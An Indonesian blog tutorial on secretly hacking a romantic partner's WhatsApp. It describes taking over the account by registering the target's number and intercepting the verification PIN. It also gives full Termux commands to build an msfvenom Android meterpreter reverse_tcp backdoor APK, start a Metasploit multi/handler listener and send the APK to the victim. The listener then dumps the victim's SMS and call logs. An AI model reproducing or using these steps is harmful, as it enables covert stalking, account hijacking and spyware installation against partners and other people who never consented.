Cara Hack WA WhatsApp Pacar dengan aplikasi Termux

Cara Hack WA WhatsApp Pacar dengan aplikasi Termux

Cara Hack WA WhatsApp Pacar dengan aplikasi Termux

WhatsApp menjadi aplikasi Media Sosial paling Popular saat ini dengan pengguna hampir menyaingi Facebook dan Instagram. Dengan menggunakan medsos ini akan mempermudah komunikasi baik Chat dengan mengirim gambar, Vidio ataupun melakukan panggilan. Dengan banyaknya fasilitas yang diberikan terkadang sepasang kekasih saling mencurigai dan mencari cara untuk Hack akun WAnya.

Perasaan cemburu terhadap pacar sangat normal terlebih lagi rasa cinta itu sangat mendalam. Mungkin jika kita inggin mengetahui pacar sedang chat dengan siapa harus membuka HP Androidnya. Nah disini kita akan mencoba melihat aktifitas pasangan tanpa menyentuh smartphone yang bersangkutan.

Ada cara sederhana yaitu tanpa menggunakan aplikasi dan anda bisa mencobanya tetapi jika tidak berhasil ada cara lain yaitu menggunakan aplikasi Termux. Saran saya cara ini anda gunakan untuk hal yang Positif supaya hasilnya juga baik. Jika pasangan tau anda menghack akun WAnya maka musibah akan datang karena kepercayaan pasangan akan luntur.

Lihat Juga : Cara mengganti FONT pada status Whatsapp

Sebelum mencobanya silahkan pikir pikir terlebih dahulu apakah anda siap untuk kehilangan dirinya. Terkadang seorang pasangan perlu berteman dan bercanda dengan orang lain. Hal inilah yang dimungkinkan akan terjadi kecemburuan terlebih lagi jika pasangan anda memiliki seorang sahabat yang berlawan jenis.

Daripada berfikir panjang silahkan anda coba Tips dan cara Hack WA orang lain, teman, ataupun Pacar dengan mudah. Usahakan anda menggunakan aplikasi WhatsApp terbaru dan terupdate supaya sistem dapat berjalan dengan baik. Jangan memaksakan menggunakan aplikasi WA versi yang lama karena jika gagal itulah penyebabnya.

Cara Hack WA WhatsApp Pacar tanpa Aplikasi :
  1. Langkah awal gunakan aplikasi WA update terbaru
  2. Siapkan Email atau No HP Target
  3. Selanjutnya masuk ke Whatsapp menggunakan No Handphone tersebut
  4. Lakukan sistem Set Up
  5. Saat WA melakukan panggilan silahkan angkat Telpon
  6. PIN juga akan dikirim ke nomor Tujuan
  7. Anda sudah berhasil menyadap nomor WA Pacar

Cara Hack WA WhatsApp Pacar dengan aplikasi Termux :
  1. Langkah pertama silahkan Download termux via google playstore, Selanjutnya buka kemudian ketik ifconfig untuk melihat alamat IP anda sendiri.
  2. Berikutnya ketikan msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.166 LPORT=4444 R >hack.apk (LHOST ganti dengan alamat ip anda).
  3. Saat file backdoor sudah jadi, silahkan anda cek atau cari dalam FILE >HOME >hack.apk
  4. Langkah selanjutnya silahkan buka lagi termux dan ketikan perintah di bawah dan pastikan datanya sama seperti file backdoor.
  5. msfconsole
    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set lhost 192.168.43.166
    set lport 4444
    exploit
  6. Berikutnya silahkan mengirim file hack.apk atau backdor tersebut ke ponsel target hack, anda bisa kirim via wa, bbm, Instagram, Messenger FB atau yang lainya.
  7. Saat target berhasil menginstal apk tersebut maka yang terjadi anda akan lihat meterpreternya.
  8. ketik dump_sms untuk melihat riwayat pesan
  9. ketik dump_calllog untuk melihat histori panggilan
  10. Selesai dan anda sudah berhasil menyadap WA Pasangan atau Pacar.

Itulah dua cara Hack WA Pacar tanpa atau dengan Aplikasi dengan mudah. Jangan gunakan sembarangan dan alangkah baiknya tidak mencobanya kepada pacar jika hubungan anda tidak inggin hancur. Cara sadap WA ini sudah banyak yang mencobanya dan berhasil, jika anda mengalami kesulitan silahkan ajukan pertanyaan di kolom komentar.


Anda bisa juga mempelajari berbagai macam cara Hack akun Medsos lainnya seperti FB, IG dan Twitter. Silahkan berkunjung ke situs ArtikelCara10.Com. Anda akan menemukan berbagai macam Tips dan Trik Android terbaru, membobol pasword Wifi dan berbagai macam Hacking lainnya. Gunakan dengan wajar ya jika terjadi apapun menjadi tanggung jawab pribadi.
Buka Komentar